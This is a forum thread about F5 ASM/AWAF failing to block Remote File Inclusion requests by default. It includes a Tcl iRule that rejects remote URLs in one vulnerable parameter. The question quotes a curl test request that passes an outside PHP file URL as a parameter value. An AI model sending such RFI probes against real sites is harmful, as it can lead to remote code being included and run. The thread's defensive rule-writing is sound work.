Nikoolayy1
Jul 21, 2023
Solved

F5 ASM/AWAF Remote File Inclusion signatures do not block http:// or https:// in the form parameter

Hello, I tested some pentesting attacks like "curl https://x.x.x.x/?niki=http://1.1.1.1/file.php -kv" and the RFI/RFE attack does not get blocked even with RFI signatures being enabled as ment...
  • Nikoolayy1
    Jul 27, 2023

    I tested this on other vendors and it is the same. The info I got is that there are no default signatures for this RFI attack, as it will cause many issues and false positives, so you need to make a custom signature/iRule to block this for the specific vulnerable parameter.

    Outside of that for XC Distributed Cloud the Service policy rules seem the way to go for configuring something like signatures:
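
The parameter-scoped iRule that the reply above recommends could look like the following. This is an added example, not code from the thread or from F5. It assumes the vulnerable parameter is `niki` (the name used in the test request in the question), that this parameter never legitimately carries a URL, and that it arrives in the query string.

```tcl
# Added example: block remote-URL values in ONE known-vulnerable parameter.
# Assumption: the parameter name "niki" comes from the test request in the
# question; replace it with the parameter your application actually includes.
when HTTP_REQUEST {
    # Value of the guarded query-string parameter; empty string if absent.
    set value [URI::query [HTTP::uri] "niki"]

    # Percent-decode repeatedly so encoded and double-encoded forms
    # (for example %68ttp%3A%2F%2F) are normalized before matching.
    # Capped at 3 rounds to bound the work per request.
    for {set i 0} {$i < 3} {incr i} {
        set decoded [URI::decode $value]
        if {$decoded eq $value} { break }
        set value $decoded
    }
    set value [string tolower [string trim $value]]

    # Match a scheme prefix (http://, https://, ftp://, ...) or a
    # scheme-relative //host reference at the start of the value.
    # Other parameters are not inspected, which is what keeps legitimate
    # URL-carrying parameters (redirect targets, callbacks) from
    # triggering false positives.
    if {[regexp {^([a-z][a-z0-9+.-]*:)?//} $value]} {
        log local0.warning "Remote URL in parameter niki rejected, client [IP::client_addr]"
        HTTP::respond 403 content "Request rejected" "Content-Type" "text/plain"
        return
    }
}
```

This rule inspects the query string only; a parameter sent in a POST body is not covered by it and would need the request payload to be collected and checked as well.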